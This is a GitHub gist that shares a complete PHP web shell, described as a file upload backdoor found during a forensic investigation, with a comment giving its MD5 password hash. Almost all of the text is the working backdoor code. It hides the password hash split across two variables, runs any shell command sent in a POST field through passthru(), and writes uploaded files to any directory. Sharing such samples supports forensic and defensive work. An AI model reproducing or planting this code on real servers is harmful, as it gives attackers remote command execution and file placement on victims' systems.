Skip to content

Instantly share code, notes, and snippets.

@jonaslejon

jonaslejon/php-upload.php

Created January 8, 2016 12:15
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jonaslejon/708c55c27c04cabc8ea7 to your computer and use it in GitHub Desktop.
Save jonaslejon/708c55c27c04cabc8ea7 to your computer and use it in GitHub Desktop.
Download ZIP
PHP file upload backdoor found during forensic investigation
Raw
php-upload.php
<?php
ini_set('display_errors','Off');
error_reporting('E_ALL');
$multipart = "236c985403e7e1";
$part = "450be30e0288de41b6";
if (md5($_POST['multipart'])==$multipart.$part){
echo '
<div align="left">
<font size="1">:</font>
</div>
<form action="'.$_SERVER['PHP_SELF'].'" name="cmd" method="POST" enctype="multipart/form-data">
<input type="text" name="cmd" size="31" class="input">
<input type="hidden" name="multipart" size="31" class="pp" value="'.$_POST['multipart'].'">
<br>
<pre>';
if ($_POST['cmd']){
$cmd = $_POST['cmd'];
passthru($cmd);
echo "<p>".@getcwd()."</p>";
}
$uploaded = $_FILES['file']['tmp_name'];
if (file_exists($uploaded)) {
$pwddir = $_POST['dir'];
$real = $_FILES['file']['name'];
$dez = $pwddir."/".$real;
copy($uploaded, $dez);
echo "<p>$dez</p>";
}
echo '<form action="'.$_SERVER['PHP_SELF'].'" name="form1" method="post" enctype="multipart/form-data">
<input type="text" name="dir" size="31" value="'.passthru("pwd").'">
<input type="submit" name="submit2" value="Upload">
<input type="file" name="file" size="15">
<input type="hidden" name="multipart" size="31" class="pp" value="'.$_POST['multipart'].'">
</td>
</tr>
</table>';
}
else
{
echo '<head><form name="multipart" method="POST" enctype="multipart/form-data">
<input type="text" name="multipart" size="31" class="input">';
}
echo '</body>
</html>';
?>
@jonaslejon
Copy link
Author

MD5: 236c985403e7e1450be30e0288de41b6

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment